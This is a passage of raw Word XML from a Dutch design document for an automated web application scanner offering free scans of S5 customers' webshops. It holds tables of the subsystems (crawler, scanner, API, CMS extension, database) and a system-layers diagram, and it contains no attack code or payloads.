              <w:t>Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F859AF" w14:paraId="1369D8D8" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2410C55C" w14:textId="0453E7CB" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="192430D2" w14:textId="29A64FF7" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Crawler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/Spider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="327025E0" w14:textId="07BFED0A" w:rsidR="00F859AF" w:rsidRDefault="000A1B28" w:rsidP="003F524C">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>HTTP communicatie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F859AF" w14:paraId="6C34678C" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EB0A178" w14:textId="0492C4A6" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C800ABD" w14:textId="1B1AC397" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Crawler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/Spider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="392F71FA" w14:textId="1C719579" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>Sessie management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F859AF" w14:paraId="2E093269" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31755CFF" w14:textId="7D9789E8" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23981566" w14:textId="1CFC4F4E" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Crawler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/Spider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E7D7547" w14:textId="6728CEF2" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>Authenticatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F859AF" w14:paraId="7E5814A7" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31DFA54F" w14:textId="67E33FE0" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02972552" w14:textId="6A735DC0" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Crawler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/Spider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD5A642" w14:textId="1C79AAB8" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Parsing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>HTML verwerking</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED79DE" w14:paraId="611DF11F" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D9C3978" w14:textId="52069B12" w:rsidR="00ED79DE" w:rsidRDefault="00ED79DE" w:rsidP="003F524C">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D556D95" w14:textId="02F10D3D" w:rsidR="00ED79DE" w:rsidRDefault="00ED79DE" w:rsidP="003F524C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Crawler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/Spider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3159E7CA" w14:textId="336CB2A5" w:rsidR="00ED79DE" w:rsidRDefault="00ED79DE" w:rsidP="003F524C">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Data opslag</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E2BE2" w14:paraId="0B98A5F7" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BDA346F" w14:textId="397D6E81" w:rsidR="002E2BE2" w:rsidRDefault="00E57B8B" w:rsidP="003F524C">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D1A6016" w14:textId="308FB39B" w:rsidR="002E2BE2" w:rsidRDefault="00B86439" w:rsidP="003F524C">
            <w:r>
              <w:t>Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57E51D0F" w14:textId="20E011E9" w:rsidR="002E2BE2" w:rsidRDefault="00F518C4" w:rsidP="003F524C">
            <w:r>
              <w:t>Aanvallen (meerdere types)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED79DE" w14:paraId="3566608C" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5DC86A" w14:textId="237C221B" w:rsidR="00ED79DE" w:rsidRDefault="00ED79DE" w:rsidP="003F524C">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01DE433C" w14:textId="591E1923" w:rsidR="00ED79DE" w:rsidRDefault="00ED79DE" w:rsidP="003F524C">
            <w:r>
              <w:t>Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46C602CE" w14:textId="5A7E093A" w:rsidR="00ED79DE" w:rsidRDefault="00ED79DE" w:rsidP="003F524C">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Data opslag</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000093" w14:paraId="57E821B1" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46C29CA2" w14:textId="1B928C8E" w:rsidR="00000093" w:rsidRDefault="00E57B8B" w:rsidP="003F524C">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32FFD456" w14:textId="44B46339" w:rsidR="00000093" w:rsidRDefault="00F94C91" w:rsidP="003F524C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Commnado’s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> en Controle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B81A6C9" w14:textId="2FEC7577" w:rsidR="00000093" w:rsidRDefault="00373EE4" w:rsidP="003F524C">
            <w:r>
              <w:t>Scan commando</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00373EE4" w14:paraId="3EB5E5FA" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1DB6AC" w14:textId="50682C34" w:rsidR="00373EE4" w:rsidRDefault="00E57B8B" w:rsidP="003F524C">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37F5B6D5" w14:textId="2135B5D7" w:rsidR="00373EE4" w:rsidRDefault="00373EE4" w:rsidP="003F524C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Commnado’s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> en Controle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6873D4C1" w14:textId="24D70C61" w:rsidR="00373EE4" w:rsidRDefault="00373EE4" w:rsidP="003F524C">
            <w:r>
              <w:t>Scan configuratie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C188C" w14:paraId="145D17FE" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EF5E99A" w14:textId="01511950" w:rsidR="005C188C" w:rsidRDefault="00E57B8B" w:rsidP="003F524C">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B0FB21B" w14:textId="20003FC2" w:rsidR="005C188C" w:rsidRDefault="005C188C" w:rsidP="003F524C">
            <w:r>
              <w:t>Rapporteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="443084A2" w14:textId="45C70EE7" w:rsidR="005C188C" w:rsidRDefault="005666D5" w:rsidP="003F524C">
            <w:r>
              <w:t>Rapport genereren</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0027091C" w14:paraId="0BC8007B" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FEFA1BE" w14:textId="48585009" w:rsidR="0027091C" w:rsidRDefault="00E57B8B" w:rsidP="003F524C">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="071CD809" w14:textId="311F9AF3" w:rsidR="0027091C" w:rsidRDefault="0027091C" w:rsidP="003F524C">
            <w:r>
              <w:t>Rapporteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="789874DB" w14:textId="5BF9717E" w:rsidR="0027091C" w:rsidRDefault="0027091C" w:rsidP="003F524C">
            <w:r>
              <w:t>Verzenden van rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F859AF" w14:paraId="6718C156" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BA33F70" w14:textId="412D7B19" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>Ondersteunend proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="632EB2F2" w14:textId="2A6D1AF4" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70C59602" w14:textId="7B7F7169" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>API calls</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F859AF" w14:paraId="7A0F696F" w14:textId="77777777" w:rsidTr="00373EE4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D2AB696" w14:textId="20E79E66" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>Ondersteunend proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DD6039C" w14:textId="697D3208" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>CMS extensie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AAB5602" w14:textId="1193CAC1" w:rsidR="00F859AF" w:rsidRDefault="00F859AF" w:rsidP="003F524C">
            <w:r>
              <w:t>Formulier verwerking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33D15402" w14:textId="29AB782B" w:rsidR="009D18CD" w:rsidRDefault="00EF54AC" w:rsidP="003F524C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tabel 4.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E09666" w14:textId="7C7130F8" w:rsidR="00D4041C" w:rsidRDefault="00364B0C" w:rsidP="00364B0C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc491022079"/>
      <w:r>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r w:rsidR="00230897">
        <w:t>Concept van het system</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="5A41D04F" w14:textId="6F91CB8F" w:rsidR="006C1F5A" w:rsidRDefault="006C1F5A"/>
    <w:p w14:paraId="086ABF16" w14:textId="6873B8B2" w:rsidR="00835C4A" w:rsidRDefault="00601227">
      <w:r>
        <w:t xml:space="preserve">Het </w:t>
      </w:r>
      <w:r w:rsidR="00FC47F9">
        <w:t xml:space="preserve">systeem wordt een geautomatiseerde </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00FC47F9">
        <w:t xml:space="preserve"> die er moet voor z</w:t>
      </w:r>
      <w:r w:rsidR="006D07BD">
        <w:t xml:space="preserve">orgen dat de klanten van S5 </w:t>
      </w:r>
      <w:r w:rsidR="00FC47F9">
        <w:t>kosteloze scan</w:t>
      </w:r>
      <w:r w:rsidR="006D07BD">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FC47F9">
        <w:t xml:space="preserve"> kunnen </w:t>
      </w:r>
      <w:r w:rsidR="0069624E">
        <w:t xml:space="preserve">laten uitvoeren op hen webshop. </w:t>
      </w:r>
      <w:r w:rsidR="008E0C2D">
        <w:t>Het systeem bestaat uit vier</w:t>
      </w:r>
      <w:r w:rsidR="00242008">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00835C4A">
        <w:t xml:space="preserve">subsystemen </w:t>
      </w:r>
      <w:r w:rsidR="00242008">
        <w:t>die in dit deel worden behandeld</w:t>
      </w:r>
      <w:r w:rsidR="00835C4A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00940807">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3539"/>
      </w:tblGrid>
      <w:tr w:rsidR="00835C4A" w14:paraId="0E1AF89A" w14:textId="77777777" w:rsidTr="00835C4A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69DAE89F" w14:textId="14515B7E" w:rsidR="00835C4A" w:rsidRDefault="00835C4A">
            <w:r>
              <w:t>Subsystemen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835C4A" w14:paraId="4B38A06A" w14:textId="77777777" w:rsidTr="00835C4A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BBFE172" w14:textId="5E6CF3F1" w:rsidR="00835C4A" w:rsidRDefault="00835C4A">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>CMS extensie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835C4A" w14:paraId="76896E2E" w14:textId="77777777" w:rsidTr="00835C4A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="566EDFB8" w14:textId="3D044177" w:rsidR="00835C4A" w:rsidRDefault="00835C4A">
            <w:r>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835C4A" w14:paraId="4A9912F6" w14:textId="77777777" w:rsidTr="00835C4A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CDCB859" w14:textId="37E26DA7" w:rsidR="00835C4A" w:rsidRDefault="00B21DE6">
            <w:r>
              <w:t>Web Applicatie Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00817A09" w14:paraId="20DD9868" w14:textId="77777777" w:rsidTr="00835C4A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DAF8067" w14:textId="702C8EF7" w:rsidR="00817A09" w:rsidRDefault="00817A09">
            <w:r>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58535685" w14:textId="41F39F94" w:rsidR="006D07BD" w:rsidRPr="00B55B74" w:rsidRDefault="00B55B74">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55B74">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tabel 4.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBCFDE5" w14:textId="235A41E9" w:rsidR="004C1F49" w:rsidRDefault="00EB6771">
      <w:r>
        <w:t>Deze vier</w:t>
      </w:r>
      <w:r w:rsidR="00BC4222">
        <w:t xml:space="preserve"> subsystemen worden geïntegreerd in het operationele omgeving van het systeem (Operationele Diagram) </w:t>
      </w:r>
      <w:r w:rsidR="00171C2A">
        <w:t xml:space="preserve">waar ieder zijn functionele doel uitvoert. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651BD97F" w14:textId="77777777" w:rsidR="003A0936" w:rsidRPr="001E1D12" w:rsidRDefault="003A0936" w:rsidP="003A0936">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1D12">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Systeem lagen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7873C4AF" w14:textId="77777777" w:rsidR="003A0936" w:rsidRDefault="003A0936" w:rsidP="003A0936">
      <w:r>
        <w:t xml:space="preserve">In het diagram 4.1 kun je goed zien wat voor informatica model het gebruikt, hoe het systeem is opgebouwd, van hoeveel servers het gebruik maakt, uit hoeveel lagen het bestaat en hoe de subsystemen met elkaar communiceren. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4D6ED4" w14:textId="77777777" w:rsidR="003A0936" w:rsidRDefault="003A0936" w:rsidP="003A0936">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251907072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="772E169A" wp14:editId="3E261A3E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-644525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>410210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6944360" cy="205994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ysteem lagen.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6944360" cy="2059940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A17B3B" w14:textId="77777777" w:rsidR="003A0936" w:rsidRDefault="003A0936" w:rsidP="003A0936">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251908096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56C97F95" wp14:editId="0B3066C7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-643255</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2299335</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6944360" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="44" name="Text Box 44"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6944360" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="198D845E" w14:textId="6FFE9D1A" w:rsidR="00CE4BB5" w:rsidRPr="00F921DA" w:rsidRDefault="00CE4BB5" w:rsidP="003A0936">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.1 vergrote diagram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97F95" id="Text Box 44" o:spid="_x0000_s1058" type="#_x0000_t202" 